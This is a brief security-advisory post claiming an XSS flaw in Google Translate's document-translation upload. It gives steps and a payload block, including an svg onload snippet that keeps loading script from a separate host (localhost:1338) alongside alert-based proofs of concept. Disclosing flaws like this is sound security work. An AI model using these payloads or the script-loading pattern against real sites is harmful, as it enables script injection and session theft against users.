Google Translate XSS [Cross Site Scripting]

Published
Credit
Risk
2016.08.17
Jonatas Fil
Low
CWE
CVE
Local
Remote
N/A
N/A
Yes
No

[+] ~ J0nshu4w - Security Research and pentester. [+]

[*] I'm a security researcher and found a sandbox fails, it consists of Cross Site Scripting, where can I send alerts, inject eval code, text, images, using the TAG <img>.

[!] Testing in Windows / Linux / MacOS: Firefox, Chrome and Opera. [!]

Ok Go!

[!] To explore it open Google Translate


[*] https://translate.google.com.br
or
[*] https://translate.google.com

[!] After just below you have the option:
[!] "Translate Document"

[*] In this parameter we will inject XSS.

[*] Create a .html file, .htm.

[*] And in it we will by malicious code [XSS] with the TAG <img>.

[+] My exploit for example: [+]
######################
<Img src = "http://i793.photobucket.com/albums/yy213/gilbef/GIFBRAZIOL.gif"
onload = "alert (" xss by j0nshu4w ")"> </ img>
<Marquee> <h1> xss is vuln by j0nshu4w </ h1> </ marquee>
<Script> alert (document.domain) </ script>
    <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//localhost:1338";d.body.appendChild(z)},0)>
####################

[*] After you have saved, select the file there in document translation options and click translate.

[#] After this XSS successfully :D [#]


DEMO:

http://imgur.com/a/XLzd4


######################
Made In Brazil 1337

[+] ~ J0nshu4w - Security Research and pentester. [+]

Facebook: /jonatasfil
Github: /ninj4c0d3r
Youtube: /c/jonatasfil

References:

https://pt.wikipedia.org/wiki/Cross-site_scripting
http://www.acunetix.com/websitesecurity/cross-site-scripting/
http://imgur.com/a/XLzd4


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com